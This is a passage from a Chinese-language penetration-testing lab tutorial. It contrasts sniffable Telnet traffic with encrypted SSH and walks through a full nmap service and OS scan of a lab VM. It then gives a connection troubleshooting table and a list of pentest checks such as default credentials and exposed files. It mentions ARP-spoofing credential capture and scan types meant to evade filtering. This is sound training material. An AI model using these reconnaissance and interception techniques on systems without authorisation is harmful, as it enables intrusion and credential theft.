与SSH的加密通信对比为了形成鲜明对比我们重复上述过程但这次用SSH连接。在抓包的同时用SSH登录靶机并执行命令。在Wireshark中查看SSH流量通常是22端口你会发现所有数据都是加密的乱码无法直接读取任何有效信息。这个实验直观地证明了为什么SSH取代了Telnet也说明了渗透测试中嗅探Sniffing明文协议流量是获取敏感信息的重要手段。在内部网络渗透中如果发现存在Telnet、FTP未使用SSL、HTTP未使用HTTPS等服务攻击者可能会尝试进行ARP欺骗等中间人攻击来截获凭据。8. 综合测试、问题排查与安全加固思维完成以上四个服务的独立配置与测试后我们可以进行一个综合测试并系统化地整理问题排查思路。8.1 多服务端口扫描与识别在Kali攻击机上对靶机进行一次全面的端口扫描和服务识别nmap -sV -sC -O -p- 192.168.56.101-sV探测服务版本。-sC使用默认脚本进行更深入的探测。-O尝试识别操作系统。-p-扫描所有65535个端口。扫描完成后你应该能在结果中清晰地看到22/tcp open ssh OpenSSH 8.9p1 ...80/tcp open http Apache httpd 2.4.52 ...23/tcp open telnet Linux telnetd4444/tcp open unknown(我们Netcat监听的那个端口)这份报告就是渗透测试信息收集阶段最重要的成果之一。它告诉你目标开放了哪些门端口每扇门后是什么服务服务类型甚至服务的具体版本服务版本。版本信息至关重要因为你可以据此搜索该版本是否存在已知的公开漏洞Exploit。8.2 连接测试问题排查速查表在实际操作中你可能会遇到各种连接失败的问题。下面是一个系统化的排查清单问题现象可能原因排查步骤靶机端排查步骤攻击机/网络Connection refused服务未运行或未监听在目标IP上1.systemctl status service_name2.netstat -tlnp | grep :port看是否有进程监听以及监听地址是否为0.0.0.01. 确认目标IP正确2. 确认端口号正确No route to host或Request timeout网络不通防火墙完全阻止1.sudo ufw status查看防火墙规则2.ip addr show确认IP配置1.ping target_ip测试连通性2. 检查虚拟网络设置是否在同一网络服务运行Nmap显示filtered网络防火墙如云主机安全组或主机防火墙阻止了探测包1.sudo ufw status numbered查看并调整规则2. 检查是否有其他防火墙如iptables:sudo iptables -L -n -v尝试其他扫描技术如-sNNULL扫描、-sFFIN扫描绕过简单过滤可以连接但认证失败服务配置禁止了某种认证方式凭据错误1. 检查服务配置文件如sshd_config中的PasswordAuthentication2. 查看认证日志如/var/log/auth.logfor SSH1. 确认使用的用户名/密码或密钥正确2. 尝试其他认证方式连接不稳定或随机断开网络问题服务资源耗尽中间有防火墙切断空闲连接1.dmesg查看系统日志有无异常2.journalctl -u service_name查看服务日志1. 使用ping -f进行洪水Ping测试谨慎使用2. 在连接命令中增加保活参数如SSH的ServerAliveInterval8.3 从配置到安全渗透测试思维延伸完成这些基础配置和测试后你的视角应该从“如何连上”转变为“这里有什么问题”。这就是渗透测试的初级思维默认凭据我们安装的Apache、SSH都是默认配置。现实中很多设备和服务使用出厂默认密码如admin/admin。你的第一项测试就应该是尝试默认凭据。不必要的服务我们特意安装了Telnet它是一个不安全的、不必要的服务。在真实评估中发现开放Telnet、rpcbind、老的Samba版本等都是需要重点标注的风险点。信息泄露Apache默认页面、SSH的版本号OpenSSH 8.9p1都是信息。通过搜索已知漏洞可能发现攻击路径。例如某个特定版本的OpenSSH可能存在用户名枚举漏洞。配置错误如果我们将Apache的目录配置错误导致/etc/passwd文件被Web访问就构成了一个严重的漏洞。检查服务的配置文件权限和内容是否安全是配置审计的一部分。防火墙规则缺失我们为了方便关闭了防火墙。在真实环境中检查防火墙是否最小化开放端口只开放业务必需的端口是安全评估的关键项。通过这第24天的扎实练习你不再只是扫描工具的被动使用者。当Nmap返回一个open端口时你脑子里能立刻浮现出这个服务从安装、配置、启动到响应的完整链条并能亲手复现它。接下来你可以尝试搭建更复杂的服务如FTP、SMB、数据库或者将这些服务放入一个虚拟网络拓扑中尝试跨网段访问那时你会对路由、网关有更深的理解。渗透测试的学习就是在这样一次次的“搭建-测试-破坏-加固”的循环中不断深化对系统与网络的理解。
